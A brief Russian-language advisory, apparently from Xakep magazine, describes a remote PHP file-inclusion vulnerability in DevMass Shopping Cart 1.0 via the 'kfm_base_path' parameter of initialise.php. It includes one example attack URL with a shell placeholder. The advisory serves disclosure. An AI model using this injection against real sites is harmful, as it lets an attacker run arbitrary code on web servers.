PHP-инклюдинг в DevMass Shopping Cart

Рекомендуем почитать:

Xakep #303. Свой Arch Linux

Содержание выпуска
Подписка на «Хакер»-60%

Программа: DevMass Shopping Cart 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «kfm_base_path» сценарием initialise.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Пример:

[target]/[path]/admin/kfm/initialise.php?kfm_base_path=[Shell]

PHP-инклюдинг в DevMass Shopping Cart

Xakep #303. Свой Arch Linux

Подпишись на наc в Telegram!

Из рубрики «Взлом»

В моей тележке ***. Колонка главреда

Задача про два камня. Собираем компьютер с серверной матплатой Lenovo RD450X

Братья Signal. Выбираем из пяти наиболее приватных и защищенных мессенджеров

HTB Runner. Эксплуатируем баг в TeamCity и совершаем runC Escape

Трюки

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Карманный Arch. Делаем флешку с живым образом Arch Linux

Последние новости

Для распространения бэкдора SpyGlace используется 0-day уязвимость в WPS Office

Google увеличивает вознаграждения за уязвимости в Chrome до 250 000 долларов США

Бумажный спецвыпуск «Хакера» по-прежнему в продаже

Бэкдор для macOS HZ Rat нацелен на китайских пользователей DingTalk и WeChat

Павла Дурова выпустили под залог после предъявления обвинений